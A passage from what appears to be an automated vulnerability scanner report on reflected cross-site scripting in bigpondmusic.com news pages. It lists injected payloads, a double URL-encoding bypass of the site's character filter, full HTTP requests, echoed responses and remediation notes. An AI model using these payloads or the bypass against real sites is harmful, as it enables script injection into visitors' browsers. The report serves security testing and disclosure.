<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Chris Brown...s behaviour pr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge8a0fa"><script>alert(1)</script>e15c2fe88f7" />
...[SNIP]...

2.341. http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5074/chris-brown-s-behaviour-praised-by-judge

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc441"style%3d"x%3aexpression(alert(1))"d904e9febc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc441"style="x:expression(alert(1))"d904e9febc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/article/5074/chris-brown-s-behaviour-praised-by-judge?bc441"style%3d"x%3aexpression(alert(1))"d904e9febc5=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 117947


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Chris Brown...s behaviour pr
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5074/chris-brown-s-behaviour-praised-by-judge?bc441"style="x:expression(alert(1))"d904e9febc5=1" />
...[SNIP]...

2.342. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6e2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e011ebe267c was submitted in the REST URL parameter 1. This input was echoed as d6e2d"><script>alert(1)</script>011ebe267c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /newsd6e2d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e011ebe267c/article/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88121


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/newsd6e2d"><script>alert(1)</script>011ebe267c/article/5076/susan-boyle-sets-records-with-the-gift" />
...[SNIP]...

2.343. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 455fa'%3b31e3657cda8 was submitted in the REST URL parameter 1. This input was echoed as 455fa';31e3657cda8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news455fa'%3b31e3657cda8/article/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87875


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news455fa';31e3657cda8';
   s.prop4 = 'article';
   s.prop5 = '5076';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.344. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ff83'%3b3c86bf410e6 was submitted in the REST URL parameter 2. This input was echoed as 2ff83';3c86bf410e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/article2ff83'%3b3c86bf410e6/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88172


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
t,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news';
   s.prop4 = 'article2ff83';3c86bf410e6';
   s.prop5 = '5076';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 +
...[SNIP]...

2.345. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b175%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42c24c395fd was submitted in the REST URL parameter 2. This input was echoed as 4b175"><script>alert(1)</script>42c24c395fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article4b175%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e42c24c395fd/5076/susan-boyle-sets-records-with-the-gift HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88389


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article4b175"><script>alert(1)</script>42c24c395fd/5076/susan-boyle-sets-records-with-the-gift" />
...[SNIP]...

2.346. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5826%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7acee5fa8bb was submitted in the REST URL parameter 4. This input was echoed as a5826"><script>alert(1)</script>7acee5fa8bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5076/susan-boyle-sets-records-with-the-gifta5826%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7acee5fa8bb HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 112908


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Susan Boyle sets records wit
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gifta5826"><script>alert(1)</script>7acee5fa8bb" />
...[SNIP]...

2.347. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8470e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278ef5a8aecaf was submitted in the REST URL parameter 4. This input was echoed as 8470e'style='x:expression(alert(1))'8ef5a8aecaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article/5076/susan-boyle-sets-records-with-the-gift8470e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278ef5a8aecaf HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:15:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 113515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Susan Boyle sets records wit
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift8470e'style='x:expression(alert(1))'8ef5a8aecaf' />
...[SNIP]...

2.348. http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5076/susan-boyle-sets-records-with-the-gift

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68b4"style%3d"x%3aexpression(alert(1))"ea1ea53588b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a68b4"style="x:expression(alert(1))"ea1ea53588b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /news/article/5076/susan-boyle-sets-records-with-the-gift?a68b4"style%3d"x%3aexpression(alert(1))"ea1ea53588b=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 112850


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Susan Boyle sets records wit
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5076/susan-boyle-sets-records-with-the-gift?a68b4"style="x:expression(alert(1))"ea1ea53588b=1" />
...[SNIP]...

2.349. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a59d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e973d1c4b81e was submitted in the REST URL parameter 1. This input was echoed as a59d5"><script>alert(1)</script>973d1c4b81e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /newsa59d5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e973d1c4b81e/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88274


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/newsa59d5"><script>alert(1)</script>973d1c4b81e/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child" />
...[SNIP]...

2.350. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ce4a'%3b8478f30dab6 was submitted in the REST URL parameter 1. This input was echoed as 8ce4a';8478f30dab6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news8ce4a'%3b8478f30dab6/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88163


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
strabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'news8ce4a';8478f30dab6';
   s.prop4 = 'article';
   s.prop5 = '5078';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.ch
...[SNIP]...

2.351. http://bigpondmusic.com/news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /news/article/5078/jay-z-opens-up-about-shooting-brother-as-a-child

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e081bde27c65 was submitted in the REST URL parameter 2. This input was echoed as 61cdc"><script>alert(1)</script>081bde27c65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/article61cdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e081bde27c65/5078/jay-z-opens-up-about-shooting-brother-as-a-child HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:14:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88044


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article61cdc"><script>alert(1)</script>081bde27c65/5078/jay-z-opens-up-about-shooting-brother-as-a-child" />
